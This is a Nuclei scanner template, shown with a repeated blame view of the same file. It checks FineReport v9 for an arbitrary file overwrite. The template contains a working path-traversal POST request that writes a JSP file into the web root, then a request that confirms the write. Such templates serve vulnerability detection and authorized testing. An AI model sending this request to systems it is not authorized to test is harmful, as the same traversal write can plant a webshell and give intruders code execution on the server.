nuclei-templates/http/vulnerabilities/finereport/fine-report-v9-file-upload....

id: fine-report-v9-file-upload

info:
  name: FineReport v9 Arbitrary File Overwrite
  author: SleepingBag945
  severity: critical
  reference:
    - https://github.com/NHPT/WebReportV9Exp/blob/main/WebReport_Exp.py
  tags: finereport,fileupload,intrusive

variables:
  string: '{{rand_base(8, "abc")}}'

http:
  - raw:
      - |
        POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/{{randstr}}.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml;charset=UTF-8

        {"__CONTENT__":"{{string}}","__CHARSET__":"UTF-8"}

      - |
        GET /WebReport/{{randstr}}.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body_2
        words:
          - "{{string}}"
Create fine-report-v9-file-upload.yaml 2023-08-22 11:27:51 +00:00			`id: fine-report-v9-file-upload`

			`info:`
			`name: FineReport v9 Arbitrary File Overwrite`
			`author: SleepingBag945`
			`severity: critical`
			`reference:`
			`- https://github.com/NHPT/WebReportV9Exp/blob/main/WebReport_Exp.py`
updated tags 2023-08-22 11:31:02 +00:00			`tags: finereport,fileupload,intrusive`
Create fine-report-v9-file-upload.yaml 2023-08-22 11:27:51 +00:00
			`variables:`
			`string: '{{rand_base(8, "abc")}}'`

			`http:`
			`- raw:`
			`- \|`
			`POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/{{randstr}}.jsp HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: text/xml;charset=UTF-8`

			`{"__CONTENT__":"{{string}}","__CHARSET__":"UTF-8"}`

			`- \|`
			`GET /WebReport/{{randstr}}.jsp HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers:`
			`- type: word`
			`part: body_2`
			`words:`
			`- "{{string}}"`